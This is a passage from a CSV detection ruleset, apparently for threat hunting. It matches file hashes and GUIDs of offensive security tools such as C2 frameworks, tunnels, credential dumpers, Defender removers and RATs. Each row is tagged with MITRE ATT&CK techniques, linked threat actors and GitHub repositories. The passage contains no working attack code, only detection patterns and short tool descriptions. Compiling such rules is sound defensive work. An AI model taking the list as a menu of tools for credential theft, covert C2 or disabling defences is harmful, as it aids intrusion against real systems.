Evasion","https://github.com/trustedsec/The_Shelf","1","0","#filehash","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","31824" "*9bb557700cb82541b43da98c6d4eac110289b54736350ba7d4467ca783f950a7*",".{0,1000}9bb557700cb82541b43da98c6d4eac110289b54736350ba7d4467ca783f950a7.{0,1000}","offensive_tool_keyword","SharpFtpC2","A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems","T1071.002 - T1105 - 
T1090.001","TA0011","N/A","N/A","C2","https://github.com/PhrozenIO/SharpFtpC2","1","0","#filehash","N/A","10","10","88","15","2023-11-09T10:37:20Z","2023-06-09T12:41:28Z","31825" "*9bb578e34921df2349f86f8867986d15cd2ed3bc510feeb6feb318493e753855*",".{0,1000}9bb578e34921df2349f86f8867986d15cd2ed3bc510feeb6feb318493e753855.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","31826" "*9bc52d5f3a9d6d2a442de0ee8f417692b2e27993707dd5f07d17b92f9ae84684*",".{0,1000}9bc52d5f3a9d6d2a442de0ee8f417692b2e27993707dd5f07d17b92f9ae84684.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","0","#filehash #linux","N/A","10","10","1135","63","2024-09-09T13:19:12Z","2022-07-01T19:33:43Z","31830" "*9bd15de627aa46533968e0f7fae19e8b855d0a40*",".{0,1000}9bd15de627aa46533968e0f7fae19e8b855d0a40.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. 
Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","31832" "*9bd65e7bdb3f403886a253cc9944ce4f460812ba9534ad4846b97fa13f6a81ee*",".{0,1000}9bd65e7bdb3f403886a253cc9944ce4f460812ba9534ad4846b97fa13f6a81ee.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","31833" "*9be156f2e68d672cc00a2e419484e13e6873ea230d83caba801f703fbbd02e64*",".{0,1000}9be156f2e68d672cc00a2e419484e13e6873ea230d83caba801f703fbbd02e64.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","31835" "*9be3e067a95db163c7789d87310be1ba8f55d0077768c5fd1c26fbc47c8808ad*",".{0,1000}9be3e067a95db163c7789d87310be1ba8f55d0077768c5fd1c26fbc47c8808ad.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","31836" "*9be91dca307ee31fb990f6697984a4a84a486a594f5937c3420a9cb765f63ddf*",".{0,1000}9be91dca307ee31fb990f6697984a4a84a486a594f5937c3420a9cb765f63ddf.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","31837" "*9be92d43d374ae72fbc28b078e1083e674ebe4da30f4f815aa9d86150b4fe024*",".{0,1000}9be92d43d374ae72fbc28b078e1083e674ebe4da30f4f815aa9d86150b4fe024.{0,1000}","offensive_tool_keyword","Checkmate","payload Execution by Fake Windows SmartScreen with requires Administrator privileges & Turn off real SmartScreen Filter","T1059 - T1070 - T1546","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/S3N4T0R-0X0/Checkmate","1","0","#filehash","N/A","9","1","95","16","2024-01-12T19:03:45Z","2024-01-04T15:56:37Z","31838" "*9bfad1d826217983cbf0bb46c9578f592002d7893e0e359ef30f888c3693ad3c*",".{0,1000}9bfad1d826217983cbf0bb46c9578f592002d7893e0e359ef30f888c3693ad3c.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential 
Access","https://github.com/login-securite/DonPAPI","1","0","#filehash","N/A","10","10","1110","130","2025-03-24T10:23:58Z","2021-09-27T09:12:51Z","31840" "*9c0087f31cd45fe4bfa0ca79b51df2c69d67c44f2fbb2223d7cf9ab8d971c360*",".{0,1000}9c0087f31cd45fe4bfa0ca79b51df2c69d67c44f2fbb2223d7cf9ab8d971c360.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","#filehash","N/A","8","5","440","61","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z","31842" "*9c00d3da7e3c0819680241d13b156c9724fa446295e7d39b204351d12c85759b*",".{0,1000}9c00d3da7e3c0819680241d13b156c9724fa446295e7d39b204351d12c85759b.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","31843" "*9c03a993cb73874e6e4ecbdd9c8df8b657f4f45395ae342e9206e56d72224d7c*",".{0,1000}9c03a993cb73874e6e4ecbdd9c8df8b657f4f45395ae342e9206e56d72224d7c.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. 
Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","#filehash","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","31844" "*9c08b2701019c0b4860a85af161c64c303400d720c494aaeade5c2d0d2607118*",".{0,1000}9c08b2701019c0b4860a85af161c64c303400d720c494aaeade5c2d0d2607118.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#filehash","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","31845" "*9c098d624b4fd2ce42067a75d0d5f37e6d580e5430ee68dea36d4325e424f1b4*",".{0,1000}9c098d624b4fd2ce42067a75d0d5f37e6d580e5430ee68dea36d4325e424f1b4.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","31846" "*9c0a560217bcbdd543c9f90eff81b714f4ddcbea9be1bd69c4c348f251be9b88*",".{0,1000}9c0a560217bcbdd543c9f90eff81b714f4ddcbea9be1bd69c4c348f251be9b88.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","31847" "*9c131cb9b12e02680ef095d8066183ac8b97fd67b0631a69126a3e614c2ea707*",".{0,1000}9c131cb9b12e02680ef095d8066183ac8b97fd67b0631a69126a3e614c2ea707.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","31849" "*9c1a7ef2f61628fc1d314b001169fcc7d2cede2f9ffe07705667ef7151fb014a*",".{0,1000}9c1a7ef2f61628fc1d314b001169fcc7d2cede2f9ffe07705667ef7151fb014a.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","31850" "*9c1c5960a8a85b20b9ad5bd47d43f5b32ac403350bef95242ad4c8cc9dbe6556*",".{0,1000}9c1c5960a8a85b20b9ad5bd47d43f5b32ac403350bef95242ad4c8cc9dbe6556.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER 
BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","31851" "*9C2282F1A49F43F1F541DD57C539C6B73D59E8924382B96B23881B85AC333928*",".{0,1000}9C2282F1A49F43F1F541DD57C539C6B73D59E8924382B96B23881B85AC333928.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","31854" "*9C30CAE4-6FBE-45CC-90C2-1D739DB92E86*",".{0,1000}9C30CAE4\-6FBE\-45CC\-90C2\-1D739DB92E86.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation 
Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#GUIDproject","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","31855" "*9c3c1eef7d60285aad7b4d948847b9cbaf3f1676c6bcedfa40ff5f9629c8c5cf*",".{0,1000}9c3c1eef7d60285aad7b4d948847b9cbaf3f1676c6bcedfa40ff5f9629c8c5cf.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","31859" "*9c409702151446f1eb8d951b45a902f2dbad1ebeacab9dd9beeaa5530e65ad0c*",".{0,1000}9c409702151446f1eb8d951b45a902f2dbad1ebeacab9dd9beeaa5530e65ad0c.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","#filehash","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","31860" "*9c409702151446f1eb8d951b45a902f2dbad1ebeacab9dd9beeaa5530e65ad0c*",".{0,1000}9c409702151446f1eb8d951b45a902f2dbad1ebeacab9dd9beeaa5530e65ad0c.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","#filehash","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","31861" "*9c46104f36627ea0842bf00c050e6fb43befa60e56369e7d4ea843a198e16323*",".{0,1000}9c46104f36627ea0842bf00c050e6fb43befa60e56369e7d4ea843a198e16323.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. 
Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","#filehash","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","31862" "*9c48888489f9c1b82e0b6db9725e9adb9cad702c8ba2de6dce77b2f560df855b*",".{0,1000}9c48888489f9c1b82e0b6db9725e9adb9cad702c8ba2de6dce77b2f560df855b.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","31863" "*9c4fb7421bff7098ad6cb75b882d76306305d1741abd89d5767c4f7d7f523a62*",".{0,1000}9c4fb7421bff7098ad6cb75b882d76306305d1741abd89d5767c4f7d7f523a62.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - 
KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","31864" "*9c5b464168986c09b7013338cefd19b006468e8dd677a3bf8e6c9477dd6cee02*",".{0,1000}9c5b464168986c09b7013338cefd19b006468e8dd677a3bf8e6c9477dd6cee02.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","31865" "*9c6804a10a191fe49061ca8022394c3a44fba75e20aa0c1fbf79a07e01f28df5*",".{0,1000}9c6804a10a191fe49061ca8022394c3a44fba75e20aa0c1fbf79a07e01f28df5.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","31868" "*9c681c023514a7ef4b402ac5f7225b9daa9244eb45443abfac27bdb684ceeebb*",".{0,1000}9c681c023514a7ef4b402ac5f7225b9daa9244eb45443abfac27bdb684ceeebb.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","31869" "*9c6da7fb7b5e60318880442374b369ec6be4a6d39c76bc18c9e4603631a5fc6c*",".{0,1000}9c6da7fb7b5e60318880442374b369ec6be4a6d39c76bc18c9e4603631a5fc6c.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","31870" "*9c7acf514e0444e5b30f506a295f7dc65b4a673dd9dbb9ca1558a612105be630*",".{0,1000}9c7acf514e0444e5b30f506a295f7dc65b4a673dd9dbb9ca1558a612105be630.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","31872" 
"*9c83d11868c8107f59440b4a1a5a7d1b0283be01781291a3ff5b22760340c11e*",".{0,1000}9c83d11868c8107f59440b4a1a5a7d1b0283be01781291a3ff5b22760340c11e.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","31873" "*9c84bbd09726eb178ebe16830e8e126edf4f25db3e22721c64f4e42dd3e70f24*",".{0,1000}9c84bbd09726eb178ebe16830e8e126edf4f25db3e22721c64f4e42dd3e70f24.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","31874" "*9c86335386ac653a324d51c1dcb3d43704a00da106833ecad21e5ffad4e8635b*",".{0,1000}9c86335386ac653a324d51c1dcb3d43704a00da106833ecad21e5ffad4e8635b.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","31875" "*9c86afa8a40314b53a51281256047f5ecebbf396a7df0dc15fc54687016d88a4*",".{0,1000}9c86afa8a40314b53a51281256047f5ecebbf396a7df0dc15fc54687016d88a4.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","31876" 
"*9c887d5a9f4522a35749c9c91863c12d3e69b22f24ebfac41b3d6290c503a460*",".{0,1000}9c887d5a9f4522a35749c9c91863c12d3e69b22f24ebfac41b3d6290c503a460.{0,1000}","offensive_tool_keyword","jackdaw","Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions. It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passowrds/users.","T1087 - T1482 - T1201 - T1213 - T1003","TA0007 - TA0008 - TA0009 - TA0006","N/A","N/A","Reconnaissance","https://github.com/skelsec/jackdaw","1","0","#filehash","N/A","5","6","576","89","2025-03-15T13:37:50Z","2019-03-27T18:36:41Z","31878" "*9c8c6832651517a7f48e8cf246721ee80be13e61222f12ff5876f7cfb92a6308*",".{0,1000}9c8c6832651517a7f48e8cf246721ee80be13e61222f12ff5876f7cfb92a6308.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","31880" "*9c9cc73f47b3b509df0845593e6b2f8d900f34772e4aaf3438bb0120303d5670*",".{0,1000}9c9cc73f47b3b509df0845593e6b2f8d900f34772e4aaf3438bb0120303d5670.{0,1000}","offensive_tool_keyword","tricky.lnk","VBS that creates a .lnk file spoofing the file extension with unicode chars that reverses the .lnk file extension. appends .txt to the end and changes the icon to notepad to make it appear as a textfile. When executed. 
the payload is a powershell webdl and execute","T1027 - T1036 - T1218.010","TA0002 - TA0003 - TA0008","N/A","N/A","Phishing","https://github.com/xillwillx/tricky.lnk","1","0","#filehash","N/A","N/A","2","114","33","2020-12-19T23:42:10Z","2016-10-26T21:25:06Z","31881" "*9ca943aed529d280554f86c58cd49fcfaf759d424cc64c9c062b6ab90de79e7e*",".{0,1000}9ca943aed529d280554f86c58cd49fcfaf759d424cc64c9c062b6ab90de79e7e.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","31882" "*9ca9d965d2d159763c2ca4431a1fa6597ca6633f443732139340341c77f6a39f*",".{0,1000}9ca9d965d2d159763c2ca4431a1fa6597ca6633f443732139340341c77f6a39f.{0,1000}","offensive_tool_keyword","SharpRODC","audit the security of read-only domain controllers","T1012 - T1482 - T1207 - T1208 - T1209 - T1212","TA0007 - TA0008 - TA0006","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpRODC","1","0","#filehash","N/A","8","2","115","8","2023-11-27T12:41:52Z","2023-11-24T14:35:49Z","31883" "*9caa9d970f801818ebf71838c7338d726bdd70fc7cac343bdb21512c3bd6ceaa*",".{0,1000}9caa9d970f801818ebf71838c7338d726bdd70fc7cac343bdb21512c3bd6ceaa.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","31884" "*9cb46943dab29908a33b801ec3c2033f7878f19e0ee2f892cd6d0c0db6bdbaa5*",".{0,1000}9cb46943dab29908a33b801ec3c2033f7878f19e0ee2f892cd6d0c0db6bdbaa5.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - 
AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","31886" "*9cb8225eb4a16ee8537cf0f46ca3cf1c750db6b92deaf4c7d8029cce95b2dd3c*",".{0,1000}9cb8225eb4a16ee8537cf0f46ca3cf1c750db6b92deaf4c7d8029cce95b2dd3c.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","31888" "*9cbbb2ac103af9b7940ec72a8e430427d86f5099f7a537e4fe2b72d69e05bdfd*",".{0,1000}9cbbb2ac103af9b7940ec72a8e430427d86f5099f7a537e4fe2b72d69e05bdfd.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","0","#filehash","N/A","8","8","724","92","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z","31889" "*9ccca75a916af75a20ae9ab06c2361cd2aa8ec8e2a0a741ebbbc762cbeb4d230*",".{0,1000}9ccca75a916af75a20ae9ab06c2361cd2aa8ec8e2a0a741ebbbc762cbeb4d230.{0,1000}","offensive_tool_keyword","CreateService","Creating a persistent service","T1543.003 - T1547.001 - T1050","TA0003","N/A","N/A","Persistence","https://github.com/uknowsec/CreateService","1","0","#filehash","N/A","4","2","105","27","2021-04-26T06:43:12Z","2020-09-23T05:03:52Z","31890" "*9CCE5C71-14B4-4A08-958D-4E593975658B*",".{0,1000}9CCE5C71\-14B4\-4A08\-958D\-4E593975658B.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. 
